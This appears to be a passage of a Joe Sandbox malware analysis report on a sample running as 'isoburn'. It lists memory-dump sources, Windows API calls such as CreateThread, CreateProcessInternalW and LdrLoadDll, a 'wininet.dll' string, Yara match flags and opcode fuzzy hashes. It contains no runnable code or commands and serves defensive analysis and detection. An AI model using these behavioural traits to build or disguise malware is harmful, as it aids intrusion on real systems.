                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 93aaf603e2c35378cc5ece2e39ad1f18e85b7ec29dfb23fe5e785ede9a842ac3
                                                                                                                            • Instruction ID: 348936d549ba376f785777a9b70dd153a1867c2ff7e8f3bce3869b2ee49d3d4d
                                                                                                                            • Opcode Fuzzy Hash: 93aaf603e2c35378cc5ece2e39ad1f18e85b7ec29dfb23fe5e785ede9a842ac3
                                                                                                                            • Instruction Fuzzy Hash: B790026220180403E1407558984460B00158BD0312FA5C011BA064555E8A298D516535
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 9a8f3cc99b18a469f419b33f624d0c5dd2af380a47d7d218a1cf3c870602c7ee
                                                                                                                            • Instruction ID: 44407a7a838877254ee657c45190adb39966c9905fdf0ce8192edb8c33268d74
                                                                                                                            • Opcode Fuzzy Hash: 9a8f3cc99b18a469f419b33f624d0c5dd2af380a47d7d218a1cf3c870602c7ee
                                                                                                                            • Instruction Fuzzy Hash: 269002622024000351057158945461B401A8BE0211BA5C021F9014590DC5258D916525
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 6cbd19b29d5f782f533c4e96c692c92494d502356769cc868484ad2f95eb2029
                                                                                                                            • Instruction ID: 4019efb8ea4492921f49a9414a8914e9bcd64d6b493439b7025b9b68b2c26c00
                                                                                                                            • Opcode Fuzzy Hash: 6cbd19b29d5f782f533c4e96c692c92494d502356769cc868484ad2f95eb2029
                                                                                                                            • Instruction Fuzzy Hash: F090023260540802E1507158945474B00158BD0311FA5C011B8024654D87558F557AA1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: ba46945ba1c8d64725c86887f0280f2ab1f32026686d57094b1cca7f89894dc1
                                                                                                                            • Instruction ID: e6cf3490d118802e3e4c86833e6b8ed2c3de253c8dc935f9f313ca34cf07e1a0
                                                                                                                            • Opcode Fuzzy Hash: ba46945ba1c8d64725c86887f0280f2ab1f32026686d57094b1cca7f89894dc1
                                                                                                                            • Instruction Fuzzy Hash: 2590023220544842E14071589444A4B00258BD0315FA5C011B8064694D96258E55BA61
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 3ceb81dd2461b35d736dbc27db81eb8f845ae0d9ce1ea489013ab60d221e1ee1
                                                                                                                            • Instruction ID: 1874806f66243c59085f13789a6d05d6d228dec3d280dcfe9bbeb4df63f118da
                                                                                                                            • Opcode Fuzzy Hash: 3ceb81dd2461b35d736dbc27db81eb8f845ae0d9ce1ea489013ab60d221e1ee1
                                                                                                                            • Instruction Fuzzy Hash: D590023220140802E1807158944464F00158BD1311FE5C015B8025654DCA158F597BA1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 53849f383d92ac75ed190a965ac6a140525607d41e81a1c93f6ce37cbcf9c24f
                                                                                                                            • Instruction ID: 46ea9a621ec84008722db015f4852fa6b1d07018855dd7f8f7ca3669a6ad1fb0
                                                                                                                            • Opcode Fuzzy Hash: 53849f383d92ac75ed190a965ac6a140525607d41e81a1c93f6ce37cbcf9c24f
                                                                                                                            • Instruction Fuzzy Hash: 0E900226211400031105B558574450B00568BD53613A5C021F9015550CD6218D615521
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: d2c664c15c5ffd950c0d0e37373ac1428e18a8ada393a2ad3904194f8f1f65bf
                                                                                                                            • Instruction ID: ab5c54b5019840df77d46f9bad0f8d1a5cc0c7549d5642c46bd6c05bd79f857c
                                                                                                                            • Opcode Fuzzy Hash: d2c664c15c5ffd950c0d0e37373ac1428e18a8ada393a2ad3904194f8f1f65bf
                                                                                                                            • Instruction Fuzzy Hash: 3C900226221400021145B558564450F04559BD63613E5C015F9416590CC6218D655721
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 8cdcd01a886930e19c93ed18113a6abd60a3778d52d3d9253e3f0c0ba0bfb1b6
                                                                                                                            • Instruction ID: 8c8f81a0c355513871cb7302628b5330dfc9c8dde53eda0f7b6029fa8f48d094
                                                                                                                            • Opcode Fuzzy Hash: 8cdcd01a886930e19c93ed18113a6abd60a3778d52d3d9253e3f0c0ba0bfb1b6
                                                                                                                            • Instruction Fuzzy Hash: FB90023260550402E1007158955470B10158BD0211FB5C411B8424568D87958E5169A2
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: fe5680591b90d83786151b9979201c4b351673abcf0db3268d0d0af7ae251790
                                                                                                                            • Instruction ID: d61f848934136abaac7ff64372945f48d561232c0c09b0585888c37266ab954d
                                                                                                                            • Opcode Fuzzy Hash: fe5680591b90d83786151b9979201c4b351673abcf0db3268d0d0af7ae251790
                                                                                                                            • Instruction Fuzzy Hash: E190022224545102E150715C944461B4015ABE0211FA5C021B8814594D85558D556621

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D19E25
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID: ")$#$#$$u$'$-$-~$.$@k$H$T$Z/$]5$f?$pa$r$vj$}$K
                                                                                                                            • API String ID: 2422867632-999386047
                                                                                                                            • Opcode ID: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                                                                                            • Instruction ID: 70151e560b6a7a839787b71f3609b7a05ab5b44828051b8f4845a8a80bee2423
                                                                                                                            • Opcode Fuzzy Hash: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                                                                                            • Instruction Fuzzy Hash: DA8166B0D05768CBEB20CF85C9587DEBAB1BB45309F1081D9D15C3B281C7BA1A89CF95
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                            • String ID: @J7<
                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                            • Opcode ID: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                                                                                            • Instruction ID: 8a520bcd7f8687c2d010e1a1f7dc6df152ca71dfc63916520b7e9389d2321179
                                                                                                                            • Opcode Fuzzy Hash: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                                                                                            • Instruction Fuzzy Hash: BB4140B5A0060A9FDB00DFD8D8809EEB7B9FF88308B108559E915EB314D775AE05CBA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                            • String ID: @J7<
                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                            • Opcode ID: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                                                                                            • Instruction ID: 99562908b633a32a2ad20744f2ada3395e0a57bae341a39ce7aff81deaf7476a
                                                                                                                            • Opcode Fuzzy Hash: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                                                                                            • Instruction Fuzzy Hash: D431EFB5A0060A9FDB10DFD8D8809EEB7B9FF88308B108559E915AB314D775EE45CBA0
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 02D33A5B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID: wininet.dll
                                                                                                                            • API String ID: 3472027048-3354682871
                                                                                                                            • Opcode ID: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                                                                                            • Instruction ID: 368771df1320617fd57e417b477b329b0bb9e64db2ae76bffec21e057848d2b2
                                                                                                                            • Opcode Fuzzy Hash: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                                                                                            • Instruction Fuzzy Hash: 9531BCB1601609BBD724DFA4CC84FEBB7B9EB88714F50411EE959AB340D770AA40CFA4
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D244D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                                                            • Instruction ID: 6ff6b2cb4d84f2b6f4170ec7f5658f0f9f01c4ab3859d0e18fc6c516740cf0fd
                                                                                                                            • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                                                            • Instruction Fuzzy Hash: 8B011AB5E4020DABDB10EBE4DC41FDEB3B99B54708F0041A5EE09A7241F671EB19CBA1
                                                                                                                            APIs
                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,02D2820E,00000010,?,?,?,00000044,?,00000010,02D2820E,?,?,?), ref: 02D39813
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2186235152-0
                                                                                                                            • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                                                            • Instruction ID: d3d7a0dae1634c15eb24479fa9a7934289df312d60f3775ab3ab7f686a9bc887
                                                                                                                            • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                                                            • Instruction Fuzzy Hash: CC0172B2204648BBCB54DE99DC81EDB77ADAB8D754F118108BA19A3241D630F8518BA4
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D19E25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                                                                                            • Instruction ID: 6bf4658c57f212a692b4ae2fded5aa795677b2f594c415dd13b313f4d0da4499
                                                                                                                            • Opcode Fuzzy Hash: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                                                                                            • Instruction Fuzzy Hash: 42F0657335131436D22061E9EC12FD7B78DCB85B65F140025F70CEA3C0DAA1F84146B5
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D19E25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                                                                                            • Instruction ID: 82aa13aa7b2ddd876ab37663e9b05202b098d8cc37d07dafce9e0c77ab509b45
                                                                                                                            • Opcode Fuzzy Hash: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                                                                                            • Instruction Fuzzy Hash: 9FF06D7228131432E22062A9DC52FD7769DCB95B61F100015F608AB3C0DAA5FC4186F9
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(02D21969,?,02D357BB,02D21969,02D3556F,02D357BB,?,02D21969,02D3556F,00001000,?,?,00000000), ref: 02D3970C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction ID: 19229763a2f1fb3424aa1c6da93ea5b361335e3700ad5ced70191c038335369f
                                                                                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction Fuzzy Hash: 75E065B2204604BBD714EE98EC41FAB77ADEFC9B50F004009FA0CA7281D630BD108BB4
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5DE58B5E,00000007,00000000,00000004,00000000,02D23CE4,000000F4), ref: 02D3975C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                                                            • Instruction ID: a05551800d7b8821b4821811ce0c0ca51bd2cb97df200f254eff0f695421df8b
                                                                                                                            • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                                                            • Instruction Fuzzy Hash: A1E06D722046057BD614EF58EC45FAB37ADDFC9710F004418FA08A7341C670BD108AB4
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02D2827C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                                                                                            • Instruction ID: d372ccfb0403c1dbcac7859894d0b9490a2effd159abc9f80f1d333b394899e1
                                                                                                                            • Opcode Fuzzy Hash: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                                                                                            • Instruction Fuzzy Hash: FEE04F7524060826EA246AA8DC45FAA33589B5876CF5C8660FD1CDB3C5E778ED4191B0
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02D21C50,02D37EAF,02D3556F,02D21C1D), ref: 02D28073
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                                                                                            • Instruction ID: 4f5cc693ed5f3d6b25c552c61185d46cb58955fae6b99bb8b46515711b114692
                                                                                                                            • Opcode Fuzzy Hash: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                                                                                            • Instruction Fuzzy Hash: A1E0C2B16411003EF310AAB8DC06F95324CAB64718F1001A8F50CE7381DB70E4008534
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02D21C50,02D37EAF,02D3556F,02D21C1D), ref: 02D28073
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                                                                                            • Instruction ID: 78692122d8a3b87eae8388c3ac1e5dac6d56b2a64a8c9de966ed206ee464257f
                                                                                                                            • Opcode Fuzzy Hash: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                                                                                            • Instruction Fuzzy Hash: 7AD05E716402083BF610A6B9DC06F96328D9B14768F544064FA0CE73C2EA64F80085B5
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000111), ref: 02D20D47
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1836367815-0
                                                                                                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                            • Instruction ID: 78d132fa18f14f407d7667115efaa23a296d72936399b0fa862b9d00f2e9c756
                                                                                                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                            • Instruction Fuzzy Hash: 20D0237770101C35A60145C46CC1DFFB71CDB847A6F004063FF08D1140D6615D0607B0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 1262a28ba1f4bb6d719a0acf38a47fb699a128c5a0a2f4b234756614e5f3cf34
                                                                                                                            • Instruction ID: 9cf1e8016d1d9343220ef8ddd99abb396d4560ebd26154b11958f42b47f3310b
                                                                                                                            • Opcode Fuzzy Hash: 1262a28ba1f4bb6d719a0acf38a47fb699a128c5a0a2f4b234756614e5f3cf34
                                                                                                                            • Instruction Fuzzy Hash: B4B09B729015C5C5EA51E7605608B2F79517BD0711F65C071F6030641F4778C5D1E975
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: 89c287dd079860fb3e05075819a1487ac6220e035433a4d5ecb33cd3d9ec2480
                                                                                                                            • Instruction ID: 457a9808e39cdb1475b9b9a0bffcf2114a6afd2568611fa91a9e71a144f45511
                                                                                                                            • Opcode Fuzzy Hash: 89c287dd079860fb3e05075819a1487ac6220e035433a4d5ecb33cd3d9ec2480
                                                                                                                            • Instruction Fuzzy Hash: 3A51A4F6B0411BBFCB10DB98A89097FFBF9BB48200B548269F465D7641D274EE518FA0
